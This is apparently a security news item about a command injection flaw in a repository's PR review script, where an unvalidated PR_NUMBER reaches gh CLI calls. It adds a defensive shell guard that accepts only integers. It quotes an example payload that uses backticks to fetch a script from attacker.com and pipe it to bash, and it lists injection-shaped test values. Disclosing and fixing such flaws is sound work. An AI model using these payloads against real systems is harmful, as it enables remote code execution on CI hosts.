## GitHub Repository Exposes High-Risk Command Injection in PR_NUMBER Script
A critical command injection vulnerability has been exposed in a GitHub repository's automation script, allowing potential remote code execution. The flaw resides in `scripts/post_review_checklist.sh`, where the `PR_NUMBER` parameter is used directly in shell commands without validation. An attacker who can control this input, either through an environment variable or when the script is invoked programmatically, can inject arbitrary commands using backticks or `$()` substitution, leading to full command execution on the host system.

The vulnerability is rated as high-risk due to its remote execution potential. The script passes the unvalidated `PR_NUMBER` variable directly into `gh` CLI commands on lines 63 and 80. For instance, an attacker could set `PR_NUMBER` to a value like ``123`curl -s attacker.com/evil.sh | bash` ``. When the script runs, the injected command would execute, potentially compromising the build environment, CI/CD pipeline, or the underlying server.

This flaw represents a significant supply chain risk for any project or organization using this script in automated workflows, such as pull request reviews or CI checks. It underscores the persistent danger of improper input sanitization in DevOps tooling and highlights how a single unvalidated parameter can become a vector for system takeover. The issue prompts immediate scrutiny of similar patterns across codebases that handle external inputs in shell scripts.
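The check a maintainer would add to such a script, as an added example that is not code from the repository in the report: a POSIX sh guard that accepts `PR_NUMBER` only when it is a plain positive integer, so backtick or `$()` content never reaches a command line. The `gh pr view` invocation and the sample inputs are assumptions constructed for illustration.

```shell
# Added example (not the reported repository's script). A pull-request number
# is a positive integer, so anything else is rejected before any command runs.

# Returns 0 only for 1 to 9 digits with no leading zero. The value is only
# pattern-matched; it is never expanded or re-parsed by the shell.
validate_pr_number() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;   # empty, or contains a non-digit (covers ` $ ( ) ; |)
        0*)          return 1 ;;   # leading zero: not a real PR number
    esac
    [ "${#1}" -le 9 ] || return 1  # sane upper bound on length
    return 0
}

# Prints, one per line, the argv the script would hand to gh. The number is a
# single quoted argument, never interpolated into a string for eval or sh -c,
# which is the pattern that lets backticks or $() execute. Validation runs
# first so a malformed value fails loudly with exit status 2.
pr_view_argv() {
    pr="$1"
    validate_pr_number "$pr" || { echo "invalid PR_NUMBER: $pr" >&2; return 2; }
    printf '%s\n' gh pr view "$pr"
}

# Constructed inputs: one valid number and two injection-shaped values.
main() {
    for v in 123 '123`id`' '123$(id)'; do
        if validate_pr_number "$v"; then
            echo "accepted: $v"
        else
            echo "rejected: $v"
        fi
    done
}

main
```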

---
- **Source**: GitHub Issues
- **Sector**: The Lab
- **Tags**: security, vulnerability, command injection, devops, supply chain
- **Credibility**: unverified
- **Published**: 2026-03-25 08:27:20
- **ID**: 32767
- **URL**: https://whisperx.ai/en/intel/32767